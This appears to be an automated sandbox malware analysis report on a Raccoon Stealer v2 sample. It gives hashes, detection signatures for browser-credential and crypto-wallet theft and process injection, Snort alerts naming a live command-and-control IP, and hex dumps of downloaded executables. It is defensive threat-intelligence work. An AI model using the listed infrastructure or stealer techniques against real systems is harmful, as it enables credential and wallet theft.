Windows Analysis Report
c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Overview

General Information

Sample Name: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe
Analysis ID: 682151
MD5: c5af2b53cf4b8d6177240a822ef6f350
SHA1: 32376015d14f746efa94473a7cb5ca7413f75dbf
SHA256: c35d4e641adf21bead54611499c416c8e2de75ac9609832d1f32c476140c38d4
Tags: exeRecordBreaker
Infos:

Detection

Raccoon Stealer v2
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
DLL side loading technique detected
Contains functionality to inject code into remote processes
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Is looking for software installed on the system
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Virustotal: Detection: 22% Perma Link
Antivirus / Scanner detection for submitted sample
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Avira: detected
Machine Learning detection for sample
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.c35d4e641adf21bead54611499c416c8e2de75ac96098.exe.13b0000.0.unpack Avira: Label: ADWARE/Amonetize.Gen7
Source: 0.0.c35d4e641adf21bead54611499c416c8e2de75ac96098.exe.13b0000.0.unpack Avira: Label: ADWARE/Amonetize.Gen7
Uses 32bit PE files
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.1.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.1.dr
Source: Binary string: nss3.pdb source: nss3.dll.1.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe Code function: 0_2_013B8E50 FindFirstFileExW, 0_2_013B8E50

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.3:49736 -> 89.208.103.4:80
Source: Traffic Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 89.208.103.4:80 -> 192.168.2.3:49736
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:57:07 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:57:07 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:57:08 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:57:08 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:57:09 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:57:09 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:57:10 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 